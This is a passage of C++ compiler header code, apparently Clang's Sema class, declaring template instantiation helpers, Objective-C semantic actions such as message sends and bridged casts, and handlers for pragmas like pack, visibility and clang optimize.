"PendingInstantiations should be empty before it is discarded.");
S.PendingInstantiations.swap(SavedPendingInstantiations);
}
private:
Sema &S;
SmallVector<VTableUse, 16> SavedVTableUses;
std::deque<PendingImplicitInstantiation> SavedPendingInstantiations;
bool Enabled;
};
/// The queue of implicit template instantiations that are required
/// and must be performed within the current local scope.
///
/// This queue is only used for member functions of local classes in
/// templates, which must be instantiated in the same scope as their
/// enclosing function, so that they can reference function-local
/// types, static variables, enumerators, etc.
std::deque<PendingImplicitInstantiation> PendingLocalImplicitInstantiations;
class LocalEagerInstantiationScope {
public:
LocalEagerInstantiationScope(Sema &S) : S(S) {
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
void perform() { S.PerformPendingInstantiations(/*LocalOnly=*/true); }
~LocalEagerInstantiationScope() {
assert(S.PendingLocalImplicitInstantiations.empty() &&
"there shouldn't be any pending local implicit instantiations");
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
private:
Sema &S;
std::deque<PendingImplicitInstantiation>
SavedPendingLocalImplicitInstantiations;
};
/// A helper class for building up ExtParameterInfos.
class ExtParameterInfoBuilder {
SmallVector<FunctionProtoType::ExtParameterInfo, 16> Infos;
bool HasInteresting = false;
public:
/// Set the ExtParameterInfo for the parameter at the given index,
///
void set(unsigned index, FunctionProtoType::ExtParameterInfo info) {
assert(Infos.size() <= index);
Infos.resize(index);
Infos.push_back(info);
if (!HasInteresting)
HasInteresting = (info != FunctionProtoType::ExtParameterInfo());
}
/// Return a pointer (suitable for setting in an ExtProtoInfo) to the
/// ExtParameterInfo array we've built up.
const FunctionProtoType::ExtParameterInfo *
getPointerOrNull(unsigned numParams) {
if (!HasInteresting) return nullptr;
Infos.resize(numParams);
return Infos.data();
}
};
void PerformPendingInstantiations(bool LocalOnly = false);
TypeSourceInfo *SubstType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity,
bool AllowDeducedTST = false);
QualType SubstType(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstType(TypeLoc TL,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstFunctionDeclType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc,
DeclarationName Entity,
CXXRecordDecl *ThisContext,
Qualifiers ThisTypeQuals);
void SubstExceptionSpec(FunctionDecl *New, const FunctionProtoType *Proto,
const MultiLevelTemplateArgumentList &Args);
bool SubstExceptionSpec(SourceLocation Loc,
FunctionProtoType::ExceptionSpecInfo &ESI,
SmallVectorImpl<QualType> &ExceptionStorage,
const MultiLevelTemplateArgumentList &Args);
ParmVarDecl *SubstParmVarDecl(ParmVarDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
int indexAdjustment,
Optional<unsigned> NumExpansions,
bool ExpectParameterPack);
bool SubstParmTypes(SourceLocation Loc, ArrayRef<ParmVarDecl *> Params,
const FunctionProtoType::ExtParameterInfo *ExtParamInfos,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<QualType> &ParamTypes,
SmallVectorImpl<ParmVarDecl *> *OutParams,
ExtParameterInfoBuilder &ParamInfos);
ExprResult SubstExpr(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the given template arguments into a list of
/// expressions, expanding pack expansions if required.
///
/// \param Exprs The list of expressions to substitute into.
///
/// \param IsCall Whether this is some form of call, in which case
/// default arguments will be dropped.
///
/// \param TemplateArgs The set of template arguments to substitute.
///
/// \param Outputs Will receive all of the substituted arguments.
///
/// \returns true if an error occurred, false otherwise.
bool SubstExprs(ArrayRef<Expr *> Exprs, bool IsCall,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<Expr *> &Outputs);
StmtResult SubstStmt(Stmt *S,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateParameterList *
SubstTemplateParams(TemplateParameterList *Params, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
SubstTemplateArguments(ArrayRef<TemplateArgumentLoc> Args,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateArgumentListInfo &Outputs);
Decl *SubstDecl(Decl *D, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the name and return type of a defaulted 'operator<=>' to form
/// an implicit 'operator=='.
FunctionDecl *SubstSpaceshipAsEqualEqual(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
ExprResult SubstInitializer(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool CXXDirectInit);
bool
SubstBaseSpecifiers(CXXRecordDecl *Instantiation,
CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
InstantiateClass(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation, CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK,
bool Complain = true);
bool InstantiateEnum(SourceLocation PointOfInstantiation,
EnumDecl *Instantiation, EnumDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
bool InstantiateInClassInitializer(
SourceLocation PointOfInstantiation, FieldDecl *Instantiation,
FieldDecl *Pattern, const MultiLevelTemplateArgumentList &TemplateArgs);
struct LateInstantiatedAttribute {
const Attr *TmplAttr;
LocalInstantiationScope *Scope;
Decl *NewDecl;
LateInstantiatedAttribute(const Attr *A, LocalInstantiationScope *S,
Decl *D)
: TmplAttr(A), Scope(S), NewDecl(D)
{ }
};
typedef SmallVector<LateInstantiatedAttribute, 16> LateInstantiatedAttrVec;
void InstantiateAttrs(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
void
InstantiateAttrsForDecl(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
bool usesPartialOrExplicitSpecialization(
SourceLocation Loc, ClassTemplateSpecializationDecl *ClassTemplateSpec);
bool
InstantiateClassTemplateSpecialization(SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK,
bool Complain = true);
void InstantiateClassMembers(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
void InstantiateClassTemplateSpecializationMembers(
SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK);
NestedNameSpecifierLoc
SubstNestedNameSpecifierLoc(NestedNameSpecifierLoc NNS,
const MultiLevelTemplateArgumentList &TemplateArgs);
DeclarationNameInfo
SubstDeclarationNameInfo(const DeclarationNameInfo &NameInfo,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateName
SubstTemplateName(NestedNameSpecifierLoc QualifierLoc, TemplateName Name,
SourceLocation Loc,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool Subst(const TemplateArgumentLoc *Args, unsigned NumArgs,
TemplateArgumentListInfo &Result,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateExceptionSpec(SourceLocation PointOfInstantiation,
FunctionDecl *Function);
bool CheckInstantiatedFunctionTemplateConstraints(
SourceLocation PointOfInstantiation, FunctionDecl *Decl,
ArrayRef<TemplateArgument> TemplateArgs,
ConstraintSatisfaction &Satisfaction);
FunctionDecl *InstantiateFunctionDeclaration(FunctionTemplateDecl *FTD,
const TemplateArgumentList *Args,
SourceLocation Loc);
void InstantiateFunctionDefinition(SourceLocation PointOfInstantiation,
FunctionDecl *Function,
bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
VarTemplateSpecializationDecl *BuildVarTemplateInstantiation(
VarTemplateDecl *VarTemplate, VarDecl *FromVar,
const TemplateArgumentList &TemplateArgList,
const TemplateArgumentListInfo &TemplateArgsInfo,
SmallVectorImpl<TemplateArgument> &Converted,
SourceLocation PointOfInstantiation, void *InsertPos,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *StartingScope = nullptr);
VarTemplateSpecializationDecl *CompleteVarTemplateSpecializationDecl(
VarTemplateSpecializationDecl *VarSpec, VarDecl *PatternDecl,
const MultiLevelTemplateArgumentList &TemplateArgs);
void
BuildVariableInstantiation(VarDecl *NewVar, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs,
LateInstantiatedAttrVec *LateAttrs,
DeclContext *Owner,
LocalInstantiationScope *StartingScope,
bool InstantiatingVarTemplate = false,
VarTemplateSpecializationDecl *PrevVTSD = nullptr);
VarDecl *getVarTemplateSpecialization(
VarTemplateDecl *VarTempl, const TemplateArgumentListInfo *TemplateArgs,
const DeclarationNameInfo &MemberNameInfo, SourceLocation TemplateKWLoc);
void InstantiateVariableInitializer(
VarDecl *Var, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateVariableDefinition(SourceLocation PointOfInstantiation,
VarDecl *Var, bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
void InstantiateMemInitializers(CXXConstructorDecl *New,
const CXXConstructorDecl *Tmpl,
const MultiLevelTemplateArgumentList &TemplateArgs);
NamedDecl *FindInstantiatedDecl(SourceLocation Loc, NamedDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool FindingInstantiatedContext = false);
DeclContext *FindInstantiatedContext(SourceLocation Loc, DeclContext *DC,
const MultiLevelTemplateArgumentList &TemplateArgs);
// Objective-C declarations.
enum ObjCContainerKind {
OCK_None = -1,
OCK_Interface = 0,
OCK_Protocol,
OCK_Category,
OCK_ClassExtension,
OCK_Implementation,
OCK_CategoryImplementation
};
ObjCContainerKind getObjCContainerKind() const;
DeclResult actOnObjCTypeParam(Scope *S,
ObjCTypeParamVariance variance,
SourceLocation varianceLoc,
unsigned index,
IdentifierInfo *paramName,
SourceLocation paramLoc,
SourceLocation colonLoc,
ParsedType typeBound);
ObjCTypeParamList *actOnObjCTypeParamList(Scope *S, SourceLocation lAngleLoc,
ArrayRef<Decl *> typeParams,
SourceLocation rAngleLoc);
void popObjCTypeParamList(Scope *S, ObjCTypeParamList *typeParamList);
Decl *ActOnStartClassInterface(
Scope *S, SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *SuperName, SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs, SourceRange SuperTypeArgsRange,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
void ActOnSuperClassOfClassInterface(Scope *S,
SourceLocation AtInterfaceLoc,
ObjCInterfaceDecl *IDecl,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperName,
SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs,
SourceRange SuperTypeArgsRange);
void ActOnTypedefedProtocols(SmallVectorImpl<Decl *> &ProtocolRefs,
SmallVectorImpl<SourceLocation> &ProtocolLocs,
IdentifierInfo *SuperName,
SourceLocation SuperLoc);
Decl *ActOnCompatibilityAlias(
SourceLocation AtCompatibilityAliasLoc,
IdentifierInfo *AliasName, SourceLocation AliasLocation,
IdentifierInfo *ClassName, SourceLocation ClassLocation);
bool CheckForwardProtocolDeclarationForCircularDependency(
IdentifierInfo *PName,
SourceLocation &PLoc, SourceLocation PrevLoc,
const ObjCList<ObjCProtocolDecl> &PList);
Decl *ActOnStartProtocolInterface(
SourceLocation AtProtoInterfaceLoc, IdentifierInfo *ProtocolName,
SourceLocation ProtocolLoc, Decl *const *ProtoRefNames,
unsigned NumProtoRefs, const SourceLocation *ProtoLocs,
SourceLocation EndProtoLoc, const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryInterface(
SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *CategoryName, SourceLocation CategoryLoc,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartClassImplementation(SourceLocation AtClassImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperClassname,
SourceLocation SuperClassLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryImplementation(SourceLocation AtCatImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *CatName,
SourceLocation CatLoc,
const ParsedAttributesView &AttrList);
DeclGroupPtrTy ActOnFinishObjCImplementation(Decl *ObjCImpDecl,
ArrayRef<Decl *> Decls);
DeclGroupPtrTy ActOnForwardClassDeclaration(SourceLocation Loc,
IdentifierInfo **IdentList,
SourceLocation *IdentLocs,
ArrayRef<ObjCTypeParamList *> TypeParamLists,
unsigned NumElts);
DeclGroupPtrTy
ActOnForwardProtocolDeclaration(SourceLocation AtProtoclLoc,
ArrayRef<IdentifierLocPair> IdentList,
const ParsedAttributesView &attrList);
void FindProtocolDeclaration(bool WarnOnDeclarations, bool ForObjCContainer,
ArrayRef<IdentifierLocPair> ProtocolId,
SmallVectorImpl<Decl *> &Protocols);
void DiagnoseTypeArgsAndProtocols(IdentifierInfo *ProtocolId,
SourceLocation ProtocolLoc,
IdentifierInfo *TypeArgId,
SourceLocation TypeArgLoc,
bool SelectProtocolFirst = false);
/// Given a list of identifiers (and their locations), resolve the
/// names to either Objective-C protocol qualifiers or type
/// arguments, as appropriate.
void actOnObjCTypeArgsOrProtocolQualifiers(
Scope *S,
ParsedType baseType,
SourceLocation lAngleLoc,
ArrayRef<IdentifierInfo *> identifiers,
ArrayRef<SourceLocation> identifierLocs,
SourceLocation rAngleLoc,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SourceLocation &protocolRAngleLoc,
bool warnOnIncompleteProtocols);
/// Build a an Objective-C protocol-qualified 'id' type where no
/// base type was specified.
TypeResult actOnObjCProtocolQualifierType(
SourceLocation lAngleLoc,
ArrayRef<Decl *> protocols,
ArrayRef<SourceLocation> protocolLocs,
SourceLocation rAngleLoc);
/// Build a specialized and/or protocol-qualified Objective-C type.
TypeResult actOnObjCTypeArgsAndProtocolQualifiers(
Scope *S,
SourceLocation Loc,
ParsedType BaseType,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<ParsedType> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<Decl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc);
/// Build an Objective-C type parameter type.
QualType BuildObjCTypeParamType(const ObjCTypeParamDecl *Decl,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Build an Objective-C object pointer type.
QualType BuildObjCObjectType(QualType BaseType,
SourceLocation Loc,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<TypeSourceInfo *> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Ensure attributes are consistent with type.
/// \param [in, out] Attributes The attributes to check; they will
/// be modified to be consistent with \p PropertyTy.
void CheckObjCPropertyAttributes(Decl *PropertyPtrTy,
SourceLocation Loc,
unsigned &Attributes,
bool propertyInPrimaryClass);
/// Process the specified property declaration and create decls for the
/// setters and getters as needed.
/// \param property The property declaration being processed
void ProcessPropertyDecl(ObjCPropertyDecl *property);
void DiagnosePropertyMismatch(ObjCPropertyDecl *Property,
ObjCPropertyDecl *SuperProperty,
const IdentifierInfo *Name,
bool OverridingProtocolProperty);
void DiagnoseClassExtensionDupMethods(ObjCCategoryDecl *CAT,
ObjCInterfaceDecl *ID);
Decl *ActOnAtEnd(Scope *S, SourceRange AtEnd,
ArrayRef<Decl *> allMethods = None,
ArrayRef<DeclGroupPtrTy> allTUVars = None);
Decl *ActOnProperty(Scope *S, SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD, ObjCDeclSpec &ODS,
Selector GetterSel, Selector SetterSel,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
Decl *ActOnPropertyImplDecl(Scope *S,
SourceLocation AtLoc,
SourceLocation PropertyLoc,
bool ImplKind,
IdentifierInfo *PropertyId,
IdentifierInfo *PropertyIvar,
SourceLocation PropertyIvarLoc,
ObjCPropertyQueryKind QueryKind);
enum ObjCSpecialMethodKind {
OSMK_None,
OSMK_Alloc,
OSMK_New,
OSMK_Copy,
OSMK_RetainingInit,
OSMK_NonRetainingInit
};
struct ObjCArgInfo {
IdentifierInfo *Name;
SourceLocation NameLoc;
// The Type is null if no type was specified, and the DeclSpec is invalid
// in this case.
ParsedType Type;
ObjCDeclSpec DeclSpec;
/// ArgAttrs - Attribute list for this argument.
ParsedAttributesView ArgAttrs;
};
Decl *ActOnMethodDeclaration(
Scope *S,
SourceLocation BeginLoc, // location of the + or -.
SourceLocation EndLoc, // location of the ; or {.
tok::TokenKind MethodType, ObjCDeclSpec &ReturnQT, ParsedType ReturnType,
ArrayRef<SourceLocation> SelectorLocs, Selector Sel,
// optional arguments. The number of types/arguments is obtained
// from the Sel.getNumArgs().
ObjCArgInfo *ArgInfo, DeclaratorChunk::ParamInfo *CParamInfo,
unsigned CNumArgs, // c-style args
const ParsedAttributesView &AttrList, tok::ObjCKeywordKind MethodImplKind,
bool isVariadic, bool MethodDefinition);
ObjCMethodDecl *LookupMethodInQualifiedType(Selector Sel,
const ObjCObjectPointerType *OPT,
bool IsInstance);
ObjCMethodDecl *LookupMethodInObjectType(Selector Sel, QualType Ty,
bool IsInstance);
bool CheckARCMethodDecl(ObjCMethodDecl *method);
bool inferObjCARCLifetime(ValueDecl *decl);
void deduceOpenCLAddressSpace(ValueDecl *decl);
ExprResult
HandleExprPropertyRefExpr(const ObjCObjectPointerType *OPT,
Expr *BaseExpr,
SourceLocation OpLoc,
DeclarationName MemberName,
SourceLocation MemberLoc,
SourceLocation SuperLoc, QualType SuperType,
bool Super);
ExprResult
ActOnClassPropertyRefExpr(IdentifierInfo &receiverName,
IdentifierInfo &propertyName,
SourceLocation receiverNameLoc,
SourceLocation propertyNameLoc);
ObjCMethodDecl *tryCaptureObjCSelf(SourceLocation Loc);
/// Describes the kind of message expression indicated by a message
/// send that starts with an identifier.
enum ObjCMessageKind {
/// The message is sent to 'super'.
ObjCSuperMessage,
/// The message is an instance message.
ObjCInstanceMessage,
/// The message is a class message, and the identifier is a type
/// name.
ObjCClassMessage
};
ObjCMessageKind getObjCMessageKind(Scope *S,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsSuper,
bool HasTrailingDot,
ParsedType &ReceiverType);
ExprResult ActOnSuperMessage(Scope *S, SourceLocation SuperLoc,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildClassMessage(TypeSourceInfo *ReceiverTypeInfo,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildClassMessageImplicit(QualType ReceiverType,
bool isSuperReceiver,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnClassMessage(Scope *S,
ParsedType Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildInstanceMessage(Expr *Receiver,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildInstanceMessageImplicit(Expr *Receiver,
QualType ReceiverType,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnInstanceMessage(Scope *S,
Expr *Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildObjCBridgedCast(SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
TypeSourceInfo *TSInfo,
Expr *SubExpr);
ExprResult ActOnObjCBridgedCast(Scope *S,
SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
ParsedType Type,
SourceLocation RParenLoc,
Expr *SubExpr);
void CheckTollFreeBridgeCast(QualType castType, Expr *castExpr);
void CheckObjCBridgeRelatedCast(QualType castType, Expr *castExpr);
bool CheckTollFreeBridgeStaticCast(QualType castType, Expr *castExpr,
CastKind &Kind);
bool checkObjCBridgeRelatedComponents(SourceLocation Loc,
QualType DestType, QualType SrcType,
ObjCInterfaceDecl *&RelatedClass,
ObjCMethodDecl *&ClassMethod,
ObjCMethodDecl *&InstanceMethod,
TypedefNameDecl *&TDNDecl,
bool CfToNs, bool Diagnose = true);
bool CheckObjCBridgeRelatedConversions(SourceLocation Loc,
QualType DestType, QualType SrcType,
Expr *&SrcExpr, bool Diagnose = true);
bool ConversionToObjCStringLiteralCheck(QualType DstType, Expr *&SrcExpr,
bool Diagnose = true);
bool checkInitMethod(ObjCMethodDecl *method, QualType receiverTypeIfCall);
/// Check whether the given new method is a valid override of the
/// given overridden method, and set any properties that should be inherited.
void CheckObjCMethodOverride(ObjCMethodDecl *NewMethod,
const ObjCMethodDecl *Overridden);
/// Describes the compatibility of a result type with its method.
enum ResultTypeCompatibilityKind {
RTC_Compatible,
RTC_Incompatible,
RTC_Unknown
};
/// Check whether the declared result type of the given Objective-C
/// method declaration is compatible with the method's class.
ResultTypeCompatibilityKind
checkRelatedResultTypeCompatibility(const ObjCMethodDecl *Method,
const ObjCInterfaceDecl *CurrentClass);
void CheckObjCMethodDirectOverrides(ObjCMethodDecl *method,
ObjCMethodDecl *overridden);
void CheckObjCMethodOverrides(ObjCMethodDecl *ObjCMethod,
ObjCInterfaceDecl *CurrentClass,
ResultTypeCompatibilityKind RTC);
enum PragmaOptionsAlignKind {
POAK_Native, // #pragma options align=native
POAK_Natural, // #pragma options align=natural
POAK_Packed, // #pragma options align=packed
POAK_Power, // #pragma options align=power
POAK_Mac68k, // #pragma options align=mac68k
POAK_Reset // #pragma options align=reset
};
/// ActOnPragmaClangSection - Called on well formed \#pragma clang section
void ActOnPragmaClangSection(SourceLocation PragmaLoc,
PragmaClangSectionAction Action,
PragmaClangSectionKind SecKind, StringRef SecName);
/// ActOnPragmaOptionsAlign - Called on well formed \#pragma options align.
void ActOnPragmaOptionsAlign(PragmaOptionsAlignKind Kind,
SourceLocation PragmaLoc);
/// ActOnPragmaPack - Called on well formed \#pragma pack(...).
void ActOnPragmaPack(SourceLocation PragmaLoc, PragmaMsStackAction Action,
StringRef SlotLabel, Expr *Alignment);
enum class PragmaPackDiagnoseKind {
NonDefaultStateAtInclude,
ChangedStateAtExit
};
void DiagnoseNonDefaultPragmaPack(PragmaPackDiagnoseKind Kind,
SourceLocation IncludeLoc);
void DiagnoseUnterminatedPragmaPack();
/// ActOnPragmaMSStruct - Called on well formed \#pragma ms_struct [on|off].
void ActOnPragmaMSStruct(PragmaMSStructKind Kind);
/// ActOnPragmaMSComment - Called on well formed
/// \#pragma comment(kind, "arg").
void ActOnPragmaMSComment(SourceLocation CommentLoc, PragmaMSCommentKind Kind,
StringRef Arg);
/// ActOnPragmaMSPointersToMembers - called on well formed \#pragma
/// pointers_to_members(representation method[, general purpose
/// representation]).
void ActOnPragmaMSPointersToMembers(
LangOptions::PragmaMSPointersToMembersKind Kind,
SourceLocation PragmaLoc);
/// Called on well formed \#pragma vtordisp().
void ActOnPragmaMSVtorDisp(PragmaMsStackAction Action,
SourceLocation PragmaLoc,
MSVtorDispMode Value);
enum PragmaSectionKind {
PSK_DataSeg,
PSK_BSSSeg,
PSK_ConstSeg,
PSK_CodeSeg,
};
bool UnifySection(StringRef SectionName,
int SectionFlags,
DeclaratorDecl *TheDecl);
bool UnifySection(StringRef SectionName,
int SectionFlags,
SourceLocation PragmaSectionLocation);
/// Called on well formed \#pragma bss_seg/data_seg/const_seg/code_seg.
void ActOnPragmaMSSeg(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
StringLiteral *SegmentName,
llvm::StringRef PragmaName);
/// Called on well formed \#pragma section().
void ActOnPragmaMSSection(SourceLocation PragmaLocation,
int SectionFlags, StringLiteral *SegmentName);
/// Called on well-formed \#pragma init_seg().
void ActOnPragmaMSInitSeg(SourceLocation PragmaLocation,
StringLiteral *SegmentName);
/// Called on #pragma clang __debug dump II
void ActOnPragmaDump(Scope *S, SourceLocation Loc, IdentifierInfo *II);
/// ActOnPragmaDetectMismatch - Call on well-formed \#pragma detect_mismatch
void ActOnPragmaDetectMismatch(SourceLocation Loc, StringRef Name,
StringRef Value);
/// ActOnPragmaUnused - Called on well-formed '\#pragma unused'.
void ActOnPragmaUnused(const Token &Identifier,
Scope *curScope,
SourceLocation PragmaLoc);
/// ActOnPragmaVisibility - Called on well formed \#pragma GCC visibility... .
void ActOnPragmaVisibility(const IdentifierInfo* VisType,
SourceLocation PragmaLoc);
NamedDecl *DeclClonePragmaWeak(NamedDecl *ND, IdentifierInfo *II,
SourceLocation Loc);
void DeclApplyPragmaWeak(Scope *S, NamedDecl *ND, WeakInfo &W);
/// ActOnPragmaWeakID - Called on well formed \#pragma weak ident.
void ActOnPragmaWeakID(IdentifierInfo* WeakName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc);
/// ActOnPragmaRedefineExtname - Called on well formed
/// \#pragma redefine_extname oldname newname.
void ActOnPragmaRedefineExtname(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaWeakAlias - Called on well formed \#pragma weak ident = ident.
void ActOnPragmaWeakAlias(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaFPContract - Called on well formed
/// \#pragma {STDC,OPENCL} FP_CONTRACT and
/// \#pragma clang fp contract
void ActOnPragmaFPContract(LangOptions::FPContractModeKind FPC);
/// ActOnPragmaFenvAccess - Called on well formed
/// \#pragma STDC FENV_ACCESS
void ActOnPragmaFEnvAccess(LangOptions::FEnvAccessModeKind FPC);
/// Called to set rounding mode for floating point operations.
void setRoundingMode(llvm::RoundingMode);
/// Called to set exception behavior for floating point operations.
void setExceptionMode(LangOptions::FPExceptionModeKind);
/// AddAlignmentAttributesForRecord - Adds any needed alignment attributes to
/// a the record decl, to handle '\#pragma pack' and '\#pragma options align'.
void AddAlignmentAttributesForRecord(RecordDecl *RD);
/// AddMsStructLayoutForRecord - Adds ms_struct layout attribute to record.
void AddMsStructLayoutForRecord(RecordDecl *RD);
/// FreePackedContext - Deallocate and null out PackContext.
void FreePackedContext();
/// PushNamespaceVisibilityAttr - Note that we've entered a
/// namespace with a visibility attribute.
void PushNamespaceVisibilityAttr(const VisibilityAttr *Attr,
SourceLocation Loc);
/// AddPushedVisibilityAttribute - If '\#pragma GCC visibility' was used,
/// add an appropriate visibility attribute.
void AddPushedVisibilityAttribute(Decl *RD);
/// PopPragmaVisibility - Pop the top element of the visibility stack; used
/// for '\#pragma GCC visibility' and visibility attributes on namespaces.
void PopPragmaVisibility(bool IsNamespaceEnd, SourceLocation EndLoc);
/// FreeVisContext - Deallocate and null out VisContext.
void FreeVisContext();
/// AddCFAuditedAttribute - Check whether we're currently within
/// '\#pragma clang arc_cf_code_audited' and, if so, consider adding
/// the appropriate attribute.
void AddCFAuditedAttribute(Decl *D);
void ActOnPragmaAttributeAttribute(ParsedAttr &Attribute,
SourceLocation PragmaLoc,
attr::ParsedSubjectMatchRuleSet Rules);
void ActOnPragmaAttributeEmptyPush(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Called on well-formed '\#pragma clang attribute pop'.
void ActOnPragmaAttributePop(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Adds the attributes that have been specified using the
/// '\#pragma clang attribute push' directives to the given declaration.
void AddPragmaAttributes(Scope *S, Decl *D);
void DiagnoseUnterminatedPragmaAttribute();
/// Called on well formed \#pragma clang optimize.
void ActOnPragmaOptimize(bool On, SourceLocation PragmaLoc);
/// Get the location for the currently active "\#pragma clang optimize
/// off". If this location is invalid, then the state of the pragma is "on".
SourceLocation getOptimizeOffPragmaLocation() const {
return OptimizeOffPragmaLocation;
}
